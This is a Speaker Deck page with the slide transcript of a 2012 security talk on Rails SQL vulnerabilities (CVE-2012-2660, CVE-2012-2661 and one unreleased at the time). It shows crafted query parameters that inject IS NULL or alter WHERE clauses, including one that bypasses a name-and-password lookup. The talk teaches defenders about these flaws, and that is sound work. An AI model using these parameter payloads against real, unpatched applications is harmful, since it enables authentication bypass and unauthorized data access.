Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
"Recent Rails SQL Issues" - 2012
Search
Justin Collins
April 23, 2015
Programming
0
63
"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Tweet
Share
More Decks by Justin Collins
See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
presidentbeef
0
130
The Evolution of Rails Security
presidentbeef
1
760
Brakeman RailsConf 2017 Lightning Talk
presidentbeef
0
120
Practical Static Analysis for Continuous Application Security
presidentbeef
0
180
"...But Doesn't Rails Take Care of Security for Me?"
presidentbeef
1
400
Continuous Security with Practical Static Analysis
presidentbeef
1
280
Security Automation at Twitter - Rise of the Machines
presidentbeef
0
210
The World of Rails Security - RailsConf 2015
presidentbeef
8
1.1k
Tales from the Crypt
presidentbeef
1
200
Other Decks in Programming
See All in Programming
Unity Android XR入門
sakutama_11
0
150
データの整合性を保つ非同期処理アーキテクチャパターン / Async Architecture Patterns
mokuo
45
16k
Domain-Driven Transformation
hschwentner
2
1.9k
SRE、開発、QAが協業して挑んだリリースプロセス改革@SRE Kaigi 2025
nealle
3
4.2k
GAEログのコスト削減
mot_techtalk
0
120
AWS Organizations で実現する、 マルチ AWS アカウントのルートユーザー管理からの脱却
atpons
0
130
Writing documentation can be fun with plugin system
okuramasafumi
0
120
ファインディの テックブログ爆誕までの軌跡
starfish719
2
1.1k
TokyoR116_BeginnersSession1_環境構築
kotatyamtema
0
110
一休.com のログイン体験を支える技術 〜Web Components x Vue.js 活用事例と最適化について〜
atsumim
0
320
Grafana Loki によるサーバログのコスト削減
mot_techtalk
1
120
パスキーのすべて ── 導入・UX設計・実装の紹介 / 20250213 パスキー開発者の集い
kuralab
3
730
Featured
See All Featured
Adopting Sorbet at Scale
ufuk
74
9.2k
Build your cross-platform service in a week with App Engine
jlugia
229
18k
Thoughts on Productivity
jonyablonski
69
4.5k
Optimising Largest Contentful Paint
csswizardry
34
3.1k
How to train your dragon (web standard)
notwaldorf
91
5.8k
Practical Tips for Bootstrapping Information Extraction Pipelines
honnibal
PRO
12
960
The Straight Up "How To Draw Better" Workshop
denniskardys
232
140k
The MySQL Ecosystem @ GitHub 2015
samlambert
250
12k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
6
550
Become a Pro
speakerdeck
PRO
26
5.1k
Making the Leap to Tech Lead
cromwellryan
133
9.1k
Art, The Web, and Tiny UX
lynnandtonic
298
20k
Transcript
Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661
CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x
and 3.x
ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end
Query Parameters ?name[] {"name"=>[nil]}
ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end
Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL
CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query
keys Affects Rails 3.x
ActiveRecord Query User.where(:name => params[:name])
ActiveRecord Query User.where("users.name" => params[:name])
Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}
ActiveRecord Query User.where(:name => {"users.id" => "1"})
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1
Unreleased Vulnerability Allows some manipulation of WHERE clause via nested
hashes in query values Affects 2.3.x and 3.x
ActiveRecord Query User.where(:name => params[:name], :password => params[:password])
Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}
ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )
Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =
1 AND "users"."id" = 1
presidentbeef
sakutama_11
mokuo
hschwentner
nealle
mot_techtalk
atpons
okuramasafumi
starfish719
kotatyamtema
atsumim
kuralab
ufuk
jlugia
jonyablonski
csswizardry
notwaldorf
honnibal
denniskardys
samlambert
irinanazarova
speakerdeck
cromwellryan
lynnandtonic
![ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_2.jpg){kind=link}
![Query Parameters ?name[] {"name"=>[nil]}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_3.jpg){kind=link}
![ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_4.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_7.jpg){kind=link}
![ActiveRecord Query User.where("users.name" => params[:name])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_8.jpg){kind=link}
![Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_9.jpg){kind=link}
![ActiveRecord Query User.where(:name => params[:name], :password => params[:password])](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_13.jpg){kind=link}
![Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}](https://files.speakerdeck.com/presentations/d3c5df5a52da43898ff9f20462f8b3d6/slide_14.jpg){kind=link}
